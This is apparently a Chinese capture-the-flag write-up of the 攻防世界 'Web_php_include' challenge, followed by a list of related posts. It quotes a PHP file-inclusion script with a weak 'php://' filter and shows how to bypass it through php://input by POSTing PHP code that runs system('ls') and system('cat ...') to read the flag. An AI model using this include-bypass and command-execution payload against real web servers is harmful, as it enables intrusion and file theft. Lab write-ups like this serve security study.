Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
Y5neKO11 小时前
某国赛CTF逆向题目Writeup:re1
python·逆向·ctf
JTaoX17 小时前
Bugku-web(源代码)
web·writeup·bugku·url编码
JTaoX1 天前
Bugku-web(source)
web·kali·source·writeup·bugku
Chen--Xing1 天前
2026SUCTF -- Crypto -- SULattice -- 解题记录
ctf·writeup·crypto·suctf·xctf
给算法爸爸上香2 天前
web网页显示点云
前端·3d·web·点云
Y5neKO3 天前
某国赛CTF逆向题目Writeup:re2
逆向·ctf
Qlittleboy3 天前
vue2页面加载慢的时候,有很多大括号怎么隐藏
web
z止于至善3 天前
服务器发送事件(SSE):前端实时通信的轻量解决方案
前端·web·服务器通信